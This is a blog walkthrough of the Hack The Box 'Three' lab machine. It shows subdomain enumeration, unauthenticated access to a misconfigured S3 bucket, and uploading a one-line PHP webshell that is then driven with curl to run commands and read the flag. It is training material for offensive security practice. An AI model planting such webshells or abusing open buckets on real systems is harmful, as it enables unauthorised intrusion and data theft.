Three - Linux
- justinblawitz
- Oct 8, 2025
- 3 min read
First, ping the target to confirm it's up, then scan it with Nmap using sudo nmap -sV {target IP}.
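The two recon steps above, sketched as shell commands (the IP is a placeholder; substitute the one HTB assigns you):

```shell
# Hypothetical target IP used for illustration only
TARGET_IP=10.10.10.10

ping -c 2 "$TARGET_IP"       # confirm the host responds
sudo nmap -sV "$TARGET_IP"   # -sV probes open ports for service names and versions
```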

We find port 22/tcp (SSH) open and port 80/tcp open running a web server. Visiting the target IP in a browser leads us to a band’s web page, and from the source code we can tell the “Contact” form is sending requests to a PHP server.


On the “Contact” page, we see thetoppers.htb in an email address, giving us the site’s domain name.

We’ll next add an entry for thetoppers.htb in /etc/hosts to be able to access the domain in the browser, using echo "{target IP} thetoppers.htb" | sudo tee -a /etc/hosts.
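A sketch of that hosts-file entry (hypothetical IP; to stay runnable without root, this writes to a scratch copy — against the real box you would tee -a into /etc/hosts with sudo, exactly as shown above):

```shell
# Hypothetical target IP; replace with yours
TARGET_IP=10.10.10.10

# Scratch stand-in for /etc/hosts so this sketch needs no root privileges
HOSTS_FILE=$(mktemp)

# tee -a appends the mapping line; the same pipe works against /etc/hosts with sudo
echo "$TARGET_IP thetoppers.htb" | tee -a "$HOSTS_FILE"
```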

Then use Gobuster to look for subdomains of the web page. A subdomain is a piece of additional information added to the beginning of a website’s domain name, allowing a site to separate and organize content for a specific function. For instance, in ctf.hackthebox.com, ctf is the subdomain, hackthebox is the primary domain, and .com is the top-level domain (TLD). Run the command gobuster vhost -w {wordlist file path} -u http://thetoppers.htb --append-domain: vhost runs Gobuster in virtual host discovery mode, -w specifies the wordlist, -u specifies the target URL, and --append-domain tells Gobuster to append the base domain to each candidate word, producing names like word.thetoppers.htb.
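The full command looks like this (the SecLists wordlist path is an assumption — any subdomain wordlist works):

```shell
# Vhost enumeration against the discovered domain; the wordlist path below
# is a common SecLists location and may differ on your system
gobuster vhost \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://thetoppers.htb \
  --append-domain
```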

This command reveals the s3.thetoppers.htb subdomain. We can add an entry for this subdomain in the /etc/hosts file using echo "{target IP} s3.thetoppers.htb" | sudo tee -a /etc/hosts.

Now, browsing to http://s3.thetoppers.htb leads us to a new page displaying {“status”: “running”}. A quick Google search tells us Amazon S3 is a cloud object storage service that stores data in containers called buckets. S3 buckets have various use cases, including backup and storage, media hosting, software delivery, and static website hosting. The files stored in an S3 bucket are called S3 objects.

We can install the AWS CLI on Linux using sudo apt install awscli and configure it using aws configure. Arbitrary values work for the access keys and region, since misconfigured servers often don’t validate credentials. In this case I used “temp” for everything.
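The interactive aws configure prompts can also be answered non-interactively with aws configure set, which may be handier in a script (the “temp” values mirror the walkthrough; any placeholders work when the server isn’t validating credentials):

```shell
sudo apt install awscli

# Placeholder credentials; the target's S3 service doesn't validate them
aws configure set aws_access_key_id temp
aws configure set aws_secret_access_key temp
aws configure set region temp
```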

Next we’ll run aws --endpoint=http://s3.thetoppers.htb s3 ls, which lists all of the S3 buckets hosted by the server, and aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb, which lists the objects and common prefixes under the specified bucket.
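Laid out as commands, with the --endpoint flag pointing awscli at the box instead of Amazon:

```shell
# List all buckets the server hosts
aws --endpoint=http://s3.thetoppers.htb s3 ls

# List the objects inside the thetoppers.htb bucket
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
```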

The bucket contains the files index.php and .htaccess plus an images directory, so it appears to be the webroot — the main directory on a web server where public content (HTML, CSS, JS, images) is stored and served to visitors — of the Apache site running on port 80.
Awscli also allows us to copy files to a remote bucket. We already know the website uses PHP, so we can try uploading a PHP shell file to the S3 bucket; since it lands in the webroot directory, we can then visit it in the browser. We do this by writing a PHP file using nano shell.php and entering <?php system($_GET['cmd']); ?> (note the straight quotes — curly quotes will break PHP).
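The same file can be created without an editor using a heredoc, which avoids any quote-mangling from copy-paste:

```shell
# Write the one-line PHP webshell; the quoted 'EOF' keeps $_GET literal
cat > shell.php <<'EOF'
<?php system($_GET['cmd']); ?>
EOF

cat shell.php   # sanity-check the contents
```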


Then we’ll upload this file to the web server using aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb, where cp shell.php s3://thetoppers.htb copies the shell.php file into the thetoppers.htb bucket. We can then list the objects again to confirm it was uploaded.
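The upload and a follow-up listing to verify it:

```shell
# Copy the webshell into the bucket
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

# Re-list the bucket; shell.php should now appear alongside index.php
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
```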

This essentially lets us use the browser’s address bar as a command line by passing commands in the cmd parameter. We can navigate files using ls and ../ to eventually find flag.txt, then use cat on the file to read and capture the flag.
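curl drives the shell the same way the address bar does; the paths below are illustrative — the exact location of flag.txt is whatever the directory listings reveal:

```shell
curl "http://thetoppers.htb/shell.php?cmd=id"        # confirm code execution
curl "http://thetoppers.htb/shell.php?cmd=ls%20../"  # %20 URL-encodes the space
curl "http://thetoppers.htb/shell.php?cmd=cat%20../flag.txt"
```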
